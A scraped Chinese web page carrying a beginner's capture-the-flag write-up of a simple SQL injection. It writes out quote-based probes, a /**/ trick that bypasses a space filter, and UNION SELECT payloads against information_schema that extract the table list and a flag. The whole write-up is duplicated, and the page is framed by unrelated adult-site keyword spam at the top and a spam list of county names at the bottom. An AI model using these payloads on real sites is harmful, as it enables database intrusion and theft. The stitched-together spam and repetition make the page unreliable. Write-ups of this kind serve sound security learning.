校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > 分享一個簡單的sql注入

分享一個簡單的sql注入

熱門標簽:奧威地圖標注多個地方 武漢長沙外呼系統方法和技巧 京華物流公司地圖標注 千呼電銷機器人價格 智能語音外呼系統選哪家 百度地圖標注不同路線 外呼系統電銷專用 怎樣在地圖上標注路線圖標 優質地圖標注

所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序,將(惡意)的SQL命令注入到后臺數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。

分別輸入1,2,3有對應的結果

使用'會報錯,于是

構造常用的sql語句:1' and '1'='1

沒有反應試一試1' and '1'='2

還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

1and1=1

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1'/**/and/**/'1'='1

發現有結果了:

于是構建sql語句:

判斷有那些數據庫:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結果:

查看有哪些數據表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

本人也是初學者,參考了許多大佬的wp 自己寫出來后有什么錯誤的地方,希望大家指出,謝謝!

根據頁面提示,到底過濾了什么東西?可以知道一定過濾了什么....

分別輸入1,2,3有對應的結果

使用'會報錯,于是

構造常用的sql語句:1' and '1'='1

沒有反應試一試1' and '1'='2

還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

1and1=1

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1'/**/and/**/'1'='1

發現有結果了:

于是構建sql語句:

判斷有那些數據庫:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結果:

查看有哪些數據表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

總結

以上所述是小編給大家介紹的一個簡單的sql注入,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!

您可能感興趣的文章:
  • Java面試題解析之判斷以及防止SQL注入
  • SQL注入原理與解決方法代碼示例
  • 通過ibatis解決sql注入問題
  • Win2003服務器防SQL注入神器--D盾_IIS防火墻
  • Sql注入工具_動力節點Java學院整理
  • Sql注入原理簡介_動力節點Java學院整理
  • 尋找sql注入的網站的方法(必看)
  • Mybatis防止sql注入的實例
  • Hibernate使用中防止SQL注入的幾種方案
  • 有效防止SQL注入的5種方法總結
  • 關于SQL注入中文件讀寫的方法總結
  • 深入了解SQL注入

標簽:來賓 防疫戰設 宿州 天水 威海 益陽 七臺河 銅仁

巨人網絡通訊聲明:本文標題《分享一個簡單的sql注入》,本文關鍵詞  分享,一個,簡單,的,sql,注入,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《分享一個簡單的sql注入》相關的同類信息!
  • 本頁收集關于分享一個簡單的sql注入的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 临武县| 历史| 历史| 平潭县| 嘉祥县| 伊川县| 邵阳县| 美姑县| 芮城县| 普兰县| 邯郸市| 锡林郭勒盟| 天祝| 利津县| 永顺县| 巴彦淖尔市| 象山县| 正宁县| 泸州市| 甘肃省| 侯马市| 商丘市| 紫云| 宜都市| 巴青县| 湖州市| 阿坝县| 兰州市| 霍州市| 开阳县| 若尔盖县| 祁东县| 高碑店市| 文登市| 汶川县| 嵊泗县| 和林格尔县| 拉萨市| 侯马市| 云安县| 晋宁县|